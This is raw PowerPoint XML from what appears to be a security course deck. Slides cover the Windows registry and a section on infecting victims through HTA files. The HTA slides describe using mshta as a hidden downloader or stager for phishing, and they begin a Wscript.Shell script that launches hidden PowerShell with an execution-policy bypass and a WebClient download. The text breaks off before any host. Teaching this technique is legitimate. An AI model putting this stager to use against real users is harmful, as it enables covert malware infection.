                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\.txt</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97" y="1844824"/>
            <a:ext cx="8802191" cy="449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7069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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  Example (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483528" y="2016069"/>
            <a:ext cx="8388424" cy="4270046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3986474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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a system-defined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in which applications and system components store and retrieve configuration data. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>data stored in the registry varies according to the version of Microsoft Windows. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>to retrieve, modify, or delete registry data.</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="737311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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="341784" y="2060848"/>
            <a:ext cx="8460432" cy="4312930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24958061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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586408" y="2143479"/>
            <a:ext cx="8100392" cy="4106684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24472279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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> files will run automatically if a user double clicks on them, because of this HTA files are excellent for Phishing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Malvertising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, or Waterhole attacks where the user will click on the file and infect themselves. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>our own malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> file is super simple and with just a few lines of code, we can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>downloader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>stager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> for any malicious code that we could want.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>To start with we want our basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and then we add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. This tag allows us to specify our app name as well as set all the visibility settings to no so that the victim won’t notice that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> file is running.</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Infection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Using a HTA File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cyber one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1323145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2675467"/>
            <a:ext cx="8928992" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Once we have the HTA tag set we will write our script to download and execute some malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>order to do this, we will take advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Wscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and pass the command that we want to run in memory along with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> flag which will keep anything from popping up on the victim’s machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//We will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wscript.shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in order to launch PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wscript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Our command to execute</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>windowstyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> hidden -ep Bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>noexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c ((New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
